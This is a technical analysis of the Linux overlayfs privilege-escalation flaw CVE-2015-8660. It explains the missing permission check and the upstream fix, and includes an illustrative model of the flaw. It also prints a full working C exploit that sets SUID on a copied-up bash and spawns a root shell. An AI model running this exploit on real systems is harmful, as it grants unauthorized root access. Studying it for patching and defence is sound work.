0x00 Test Environment
Item | Environment | Note
Operating system | Ubuntu 15.04 | Virtual machine
Kernel version | 3.19.0-15-generic |
Vulnerable source | fs/overlayfs/inode.c | Before 2015.12.11
Exploit | C | Privilege escalation
0x01 Principle Analysis
1) Overview
Common kernel privilege-escalation exploits work by finding a way to execute commit_creds(prepare_kernel_cred(0)) in the kernel. This vulnerability reaches the same goal by a different and rather elegant route: a logic flaw that bypasses a permission check instead of corrupting memory. The affected kernel versions include Linux kernel 3.18.x, 3.19.x, 4.1.x, 4.2.x and 4.3.x.
OverlayFS is a widely used union (layered) file system with a simple implementation. It merges an upper and a lower layer, lets same-named files in the upper layer mask those in the lower layer, and performs copy-on-write: it is designed to provide a writable temporary file system (the upper layer) on top of a read-only device (the lower layer).
2) Vulnerability Analysis
The vulnerability is caused by a flaw in the function ovl_setattr() in fs/overlayfs/inode.c. A process inside a user namespace holds CAP_SYS_ADMIN within that namespace, so an unprivileged user can mount an overlayfs inside their own mount namespace. When setattr (for example chmod) is called on a file that exists only in the lower layer, the pre-fix ovl_setattr() folded the caller's requested attribute change into the copy-up operation. Copy-up writes the lower file's metadata verbatim to the new upper copy and legitimately runs with elevated privileges, so the caller's own permission to make the change was never checked. This bypasses the file system's permission check and lets the attacker change the attributes of any file visible through the overlay, for example setting the SUID bit on bash. Because the upper directory lives on the host file system, the SUID root bash persists after the namespace is gone; once the child process has exited, the main process executes it and calls setresuid() to set the real, effective and saved UID to 0, yielding a root shell. The upstream fix ("ovl: fix permission checking for setattr") calls inode_change_ok() before the copy-up, copies the file up verbatim, and then applies the requested change through notify_change() on the upper dentry so that the normal VFS permission check runs. Below is a comparison with the patch:
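To make the control-flow difference concrete, here is an added userspace model of the pre-fix and fixed ovl_setattr() logic. It is an illustration written for this page, not kernel code and not code from the original post: struct cred, struct inode, struct iattr, inode_change_ok(), notify_change() and ovl_copy_up() are simplified stand-ins that play the same roles as their kernel namesakes, and the uid 1000 attacker chmod'ing a root-owned, lower-only bash is a constructed scenario.

```c
/*
 * Added example: a minimal userspace model of ovl_setattr() before and after
 * the CVE-2015-8660 fix. Not kernel code; all types and helpers below are
 * simplified stand-ins for the kernel's, keeping only the control flow that
 * matters for the bug.
 */
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

#define ATTR_MODE 0x1u      /* iattr: mode change requested */
#define MODE_SUID 04000u    /* the SUID bit */

struct cred  { unsigned uid; bool cap_fowner; };   /* caller credentials */
struct inode { unsigned uid; unsigned mode; };     /* inode metadata */
struct iattr { unsigned ia_valid; unsigned ia_mode; };

/* Overlay dentry: the lower inode always exists, upper is NULL until copy-up. */
struct ovl_dentry {
    struct inode lower;
    struct inode upper_store;
    struct inode *upper;
};

typedef int (*ovl_setattr_fn)(const struct cred *, struct ovl_dentry *,
                              const struct iattr *);

/* Stand-in for inode_change_ok(): only the owner or a CAP_FOWNER holder
 * may change the mode. This is the VFS check a chmod must pass. */
static int inode_change_ok(const struct cred *c, const struct inode *inode,
                           const struct iattr *attr)
{
    if ((attr->ia_valid & ATTR_MODE) && c->uid != inode->uid && !c->cap_fowner)
        return -EPERM;
    return 0;
}

/* Stand-in for notify_change(): permission check, then apply. */
static int notify_change(const struct cred *c, struct inode *inode,
                         const struct iattr *attr)
{
    int err = inode_change_ok(c, inode, attr);
    if (err)
        return err;
    if (attr->ia_valid & ATTR_MODE)
        inode->mode = attr->ia_mode;
    return 0;
}

/* Stand-in for copy-up: recreate the lower file's metadata verbatim in the
 * upper layer. This step runs with elevated privilege (it must be able to
 * recreate a root-owned file), so it does no permission check of its own.
 * The pre-fix code passed the caller's attr in here and merged it. */
static void ovl_copy_up(struct ovl_dentry *d, const struct iattr *attr)
{
    d->upper_store = d->lower;
    if (attr && (attr->ia_valid & ATTR_MODE))
        d->upper_store.mode = attr->ia_mode;   /* unchecked merge: the bug */
    d->upper = &d->upper_store;
}

/* Pre-fix ovl_setattr(): checked path only if an upper copy already exists;
 * a lower-only file goes straight to copy-up with attr, unchecked. */
static int ovl_setattr_vulnerable(const struct cred *c, struct ovl_dentry *d,
                                  const struct iattr *attr)
{
    if (d->upper)
        return notify_change(c, d->upper, attr);
    ovl_copy_up(d, attr);
    return 0;
}

/* Fixed ovl_setattr(): check first, copy up verbatim, then apply the change
 * through notify_change() as the caller. */
static int ovl_setattr_fixed(const struct cred *c, struct ovl_dentry *d,
                             const struct iattr *attr)
{
    int err = inode_change_ok(c, d->upper ? d->upper : &d->lower, attr);
    if (err)
        return err;
    if (!d->upper)
        ovl_copy_up(d, NULL);
    return notify_change(c, d->upper, attr);
}

/* Constructed scenario: caller with caller_uid runs chmod 04755 on a
 * root-owned bash that exists only in the lower layer. */
static int run_scenario(ovl_setattr_fn setattr, unsigned caller_uid,
                        unsigned *upper_mode_out)
{
    struct cred caller = { .uid = caller_uid, .cap_fowner = false };
    struct ovl_dentry bash = { .lower = { .uid = 0, .mode = 0755 }, .upper = NULL };
    struct iattr attr = { .ia_valid = ATTR_MODE, .ia_mode = MODE_SUID | 0755 };
    int err = setattr(&caller, &bash, &attr);
    if (upper_mode_out)
        *upper_mode_out = bash.upper ? bash.upper->mode : 0;
    return err;
}

/* Convenience wrappers: error code, and resulting upper mode (0 = no copy-up). */
static int scenario_err(ovl_setattr_fn setattr, unsigned caller_uid)
{
    return run_scenario(setattr, caller_uid, NULL);
}

static unsigned scenario_upper_mode(ovl_setattr_fn setattr, unsigned caller_uid)
{
    unsigned mode;
    run_scenario(setattr, caller_uid, &mode);
    return mode;
}

int main(void)
{
    printf("vulnerable, uid 1000: err=%d upper mode=%o\n",
           scenario_err(ovl_setattr_vulnerable, 1000),
           scenario_upper_mode(ovl_setattr_vulnerable, 1000));
    printf("fixed,      uid 1000: err=%d upper mode=%o\n",
           scenario_err(ovl_setattr_fixed, 1000),
           scenario_upper_mode(ovl_setattr_fixed, 1000));
    printf("fixed,      uid 0:    err=%d upper mode=%o\n",
           scenario_err(ovl_setattr_fixed, 0),
           scenario_upper_mode(ovl_setattr_fixed, 0));
    return 0;
}
```

With the pre-fix flow the unprivileged caller gets a 04755 root-owned upper copy and no error; with the fixed flow the same request fails with -EPERM before any copy-up happens, while the legitimate owner (uid 0) can still set the bit.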
3) POC
I will use the mount command to illustrate the principle: after mounting an overlayfs as an unprivileged user and changing the mode of a file through the mount, the copied-up file in the upper directory carries the new mode, while the original file in the lower directory is left untouched:
0x02 Exploit
1) Exploitation idea
① Use clone(childfunc, child_stack+stack_size, CLONE_NEWUSER | CLONE_NEWNS | SIGCHLD, args) to create a process in new user and mount namespaces (tested: adding the remaining namespaces also works);
② In the child process, mount an overlayfs on the temporary directory /tmp/exp/o with /bin as the lower directory and the temporary directory /tmp/exp/u as the upper directory;
③ Because the lower directory is /bin, after the mount the /tmp/exp/o directory also contains the bash file from /bin;
④ Because the kernel does not check whether the caller has permission to modify the file's attributes, chmod can set the SUID bit on bash; the copied-up bash in the upper directory is then SUID root;
⑤ Outside the namespace, run that bash and call setresuid(0,0,0) to turn the new shell into a root shell. This last step requires that the file system holding the upper directory (here /tmp) is not mounted nosuid, otherwise the SUID bit is ignored.
2) Exp:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <sys/wait.h>

static char child_stack[1024 * 1024];

static int child_exec(void *stuff)
{
    printf("Clone a user namespace\n");
    mkdir("/tmp/w", 0777);   /* workdir */
    mkdir("/tmp/u", 0777);   /* upperdir: the copied-up bash will land here */
    mkdir("/tmp/o", 0777);   /* mount point of the merged view */

    printf("Mount overlayfs in user namespace:\n");
    /* MS_MGC_VAL is the old "magic" flags value; it has no effect here */
    if (mount("overlay", "/tmp/o", "overlay", MS_MGC_VAL,
              "lowerdir=/bin,upperdir=/tmp/u,workdir=/tmp/w") != 0) {
        printf("Mount failed...\n");
        fprintf(stderr, "Mount failed...\n");
    } else {
        printf("Mount success!!\n");
    }
    chmod("/tmp/w/work", 0777);
    chdir("/tmp/o");          /* change into the merged view */
    chmod("bash", 04755);     /* set SUID on bash: copy-up into /tmp/u with no permission check */
    chdir("/");               /* back to the root directory */
    umount("/tmp/o");         /* unmount; outside the namespace /tmp/u/bash keeps its SUID bit */
    return 0;
}

int main(int argc, char *argv[])
{
    int status;
    pid_t init;
    /* create all the remaining namespaces for the child */
    int clone_flags = CLONE_NEWNS | CLONE_NEWUTS | CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWIPC | SIGCHLD;
    struct stat s;

    if ((init = fork()) == 0) {
        /* child: enter a new user namespace first, then clone the worker */
        if (unshare(CLONE_NEWUSER) != 0)
            printf("Failed to create new user namespace\n");
        pid_t pid = clone(child_exec, child_stack + (1024 * 1024), clone_flags, NULL);
        if (pid < 0) {
            printf("error\n");
            fprintf(stderr, "Failed to create new mount namespace\n");
            exit(-1);
        }
        waitpid(pid, &status, 0);
        printf("Now return to parent process\n");
        return 0;
    }

    usleep(30000);            /* let the child get going */
    wait(NULL);               /* wait for the child to return */
    stat("/tmp/u/bash", &s);  /* inspect the copied-up bash */
    printf("Get the s.st_mode is %o\n", s.st_mode);
    /* 0x89ed == 0104755 == S_IFREG | S_ISUID | 0755: regular file with the SUID bit set */
    if (s.st_mode == 0x89ed) {
        printf("Successfully set the bash SUID bit as shown below:\n");
        system("ls -al /tmp/u/ | grep bash");
        printf("\n\n");
        /* bash -p keeps the effective uid of 0; python then sets real, effective and saved uid to 0 */
        execl("/tmp/u/bash", "bash", "-p", "-c",
              "python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"", NULL);
    } else {
        printf("execl error!!\n");
    }
    return 0;
}
0x03 Process Summary
1) Effect of the privilege escalation
After running the exploit, the SUID bit of the bash copied up into /tmp/u is set:
Root privileges are obtained:
2) Summary
Exposing kernel functionality to unprivileged users through user namespaces increases the kernel's attack surface. Linux containers rely on these namespaces for isolation, so without careful privilege allocation, proper permission checks and timely kernel maintenance, a bug like this one can lead to a container escape.
CVE-2015-8660 Analysis